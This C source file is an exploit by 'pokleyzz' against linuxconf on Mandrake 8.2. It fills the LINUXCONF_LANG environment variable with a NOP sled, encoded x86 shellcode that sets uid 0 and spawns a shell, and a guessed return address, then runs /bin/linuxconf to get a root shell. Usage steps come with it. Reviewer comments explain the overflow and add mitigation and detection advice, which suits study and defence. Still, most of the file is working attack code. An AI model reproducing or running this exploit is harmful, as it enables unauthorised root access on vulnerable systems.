/*
 * linuxconf mandrake 8.2 by pokleyzz (pokleyzz@scan-associates.net)
 * ** for my confirmation **
 *
 * greet : *(sk + wanvadder + Skywizard + The_Gigco + scan clan (if exist) + #mylinux + #mybsd)
 *
 * usage :
 *   $ gcc elinuxconf.c -o elinuxconf
 *   $ mkdir linuxconf.eng
 *   $ touch linuxconf.eng/linuxconf.eng
 *   $ ./elinuxconf
 *   # reboot
 *
 * http://www.scan-associates.net
 *
 * NOTE(review): what this listing shows, read from the code below:
 *  - It builds a 2050-byte value, stores it in the LINUXCONF_LANG environment
 *    variable and then executes /bin/linuxconf. Presumably linuxconf copies
 *    that variable into a fixed-size stack buffer without a length check; the
 *    vulnerable code itself is not on this page.
 *  - The payload comment mentions setreuid(0,0), which only matters if
 *    linuxconf runs with a root effective uid (set-uid) -- confirm the file
 *    mode on affected hosts. Removing the set-uid bit or installing the vendor
 *    fix closes the path; the durable fix is bounds-checking environment input
 *    in the privileged program.
 *  - Detection: a LINUXCONF_LANG value in the kilobyte range, or one holding
 *    non-printable bytes, in exec/audit records is not a legitimate locale name.
 *  - The technique relies on a hard-coded address (DUMMY), a stack-pointer
 *    guess and code placed in the environment block, so it assumes 32-bit x86,
 *    an executable stack and predictable addresses.
 */

/* NOTE(review): the five header names were lost in page extraction (angle-
 * bracket text stripped); the directives are left exactly as found. */
#include
#include
#include
#include
#include

/* Path of the program that is executed with the crafted environment. */
#define LINUXCONF "/bin/linuxconf"
/* Size of the heap buffer that becomes the LINUXCONF_LANG value. */
#define BUFFSIZE 2050
/* Subtracted from this process's own stack pointer to form the address guess. */
#define OFFSET 0x1111
// pointer to some string
/* NOTE(review): a fixed address; presumably specific to one linuxconf build. */
#define DUMMY 0x0811708d

/* Opaque machine-code payload. The author's comment is the only description
 * available here; the bytes are left exactly as found. */
char shellcode[] =
/*execve with setreuid(0,0) and no '/' hellkit v1.1 */
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
"\xc2\x91";

/*
 * Copies the current stack pointer into %eax (32-bit x86 inline asm).
 * The function has no return statement: the caller receives a value only
 * because %eax is the return register of the 32-bit x86 calling convention.
 * In C terms, using that result is undefined behaviour.
 */
long get_sp ()
{
    __asm__("movl %esp,%eax");
}

/*
 * Builds the LINUXCONF_LANG value and executes linuxconf with it.
 * argc and argv are unused. Returns 0 only if execl() fails, since a
 * successful execl() does not return.
 */
int main (int argc, char **argv)
{
    char *buff;
    int i , ret;

    /* The allocation result is not checked before use. */
    buff = (char *)malloc(BUFFSIZE);
    /* Address guess: this process's stack pointer minus OFFSET, narrowed
     * from long to int. */
    ret = get_sp() - OFFSET;

    /* Bytes 0..2047 are filled with 0x90, the x86 NOP opcode. */
    for (i = 0;i < 2048 ; i++)
        buff[i] = 0x90;

    /* The payload is copied to offset 1600; strlen() stops at the first zero
     * byte, so the array's terminator is not copied. */
    memcpy((char*)(buff + 1600),shellcode,strlen(shellcode));

    /* 27 pointer-sized stores of DUMMY starting at offset 1940. With 4-byte
     * pointers they cover bytes 1940..2047; with 8-byte pointers the last
     * store would run past the 2050-byte allocation. DUMMY is an integer
     * stored through a char ** lvalue without a cast. */
    for (i = 0; i < 108 ; i+=4)
        *(char **)&buff[1940 +i] = DUMMY;

    /* One of those words is replaced by the guessed address; presumably this
     * is the slot that lines up with a saved return address in the target --
     * not verifiable from this page. */
    *(char **)&buff[1976] = ret;

    /* Terminator at the last index. Index 2048 is never written, so it holds
     * whatever malloc() returned. */
    buff[2049] = 0x00;

    /* Third argument 1: overwrite any existing LINUXCONF_LANG. */
    setenv("LINUXCONF_LANG",buff,1);
    /* The argument list ends with a plain 0 rather than (char *)NULL, and the
     * return value is not checked. */
    execl(LINUXCONF, "linuxconf", 0);
    return 0;
}